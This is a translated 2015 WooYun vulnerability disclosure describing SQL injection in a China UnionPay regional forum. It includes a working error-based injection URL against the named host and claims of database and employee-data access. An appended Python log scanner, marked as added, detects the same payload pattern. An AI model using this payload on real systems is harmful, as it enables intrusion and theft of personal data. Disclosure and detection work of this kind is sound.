
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0109097

Vulnerability title: SQL injection in a regional business system of a large Chinese financial institution (DBA privileges; employee information obtainable)

Vendor: China UnionPay (中国银联)

Author: 几何黑店

Submitted: 2015-04-19 20:58

Fixed: 2015-06-08 09:10

Published: 2015-06-08 09:10

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-04-19: Details sent to the vendor, awaiting vendor handling
2015-04-24: Vendor confirmed; details disclosed to the vendor only
2015-05-04: Details disclosed to core white hats and domain experts
2015-05-14: Details disclosed to regular white hats
2015-05-24: Details disclosed to intern white hats
2015-06-08: Details disclosed to the public

Brief description:

SQL injection in a regional business system of China UnionPay (employee information obtainable)

Detailed description:

http://bbs.gnete.com
runs SupeSite, so known SupeSite vulnerabilities were checked. The following error-based injection request (a MySQL updatexml() call in the `name` parameter of batch.common.php, which leaks the result of the subquery through the error message) confirmed the issue:

http://bbs.gnete.com/batch.common.php?action=modelquote&cid=1&name=members%20where%201=1%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(521521)),0x5e24),1))%23
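As an added defender-side example (not part of the original report): a small Python scanner that flags the request pattern above in web-server access logs. It URL-decodes each query string, looks for MySQL error-reporting functions (updatexml/extractvalue) and checks that the `name` parameter is a bare table identifier, which is also the server-side whitelist such a parameter should be validated against. The log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample access-log lines (not taken from the original report);
# the second one carries the modelquote payload pattern described above.
SAMPLE_LOG = """\
203.0.113.5 - - [19/Apr/2015:18:09:12 +0800] "GET /batch.common.php?action=modelquote&cid=1&name=members HTTP/1.1" 200 512
203.0.113.5 - - [19/Apr/2015:18:09:40 +0800] "GET /batch.common.php?action=modelquote&cid=1&name=members%20where%201=1%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(521521)),0x5e24),1))%23 HTTP/1.1" 500 233
198.51.100.7 - - [19/Apr/2015:18:10:02 +0800] "GET /index.php HTTP/1.1" 200 1024
"""

# MySQL functions whose error text echoes back an attacker-chosen string
ERROR_FUNCS = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.IGNORECASE)
# A table-name parameter must be a bare identifier; anything else is suspect
IDENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
# Pull the request target out of a Common Log Format line
LOG_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def inspect_request(url: str) -> list[str]:
    """Return the reasons a request looks like error-based SQL injection."""
    parts = urlsplit(url)
    params = parse_qs(parts.query, keep_blank_values=True)
    decoded = unquote_plus(parts.query)
    reasons = []
    if ERROR_FUNCS.search(decoded):
        reasons.append("MySQL error-reporting function in query string")
    for value in params.get("name", []):
        if not IDENT.fullmatch(value):
            reasons.append(f"name parameter is not a bare identifier: {value[:40]!r}")
    return reasons

def scan_log(text: str) -> list[tuple[str, list[str]]]:
    """Return (client_ip, reasons) for every log line that trips a rule."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        reasons = inspect_request(m.group(1))
        if reasons:
            hits.append((line.split()[0], reasons))
    return hits

if __name__ == "__main__":
    for ip, reasons in scan_log(SAMPLE_LOG):
        print(ip, "->", "; ".join(reasons))
```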


[Screenshot: QQ图片20150419180912.png]


Database: gnete_bbs
[276 tables]


[Screenshot: QQ图片20150419181538.png]

[Screenshot: QQ图片20150419152511.png]

Proof of vulnerability:

[Screenshot: QQ图片20150419181224.png]

[Screenshot: QQ图片20150419181333.png]

Fix recommendation:

You know what to do.

Copyright notice: when reposting, credit 几何黑店@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-04-24 09:09

Vendor reply:

CNVD could not reproduce the described situation; the report has been forwarded by CNCERT to the banking-sector IT regulator, which will coordinate follow-up handling with the site's operating unit.

Latest status:

None yet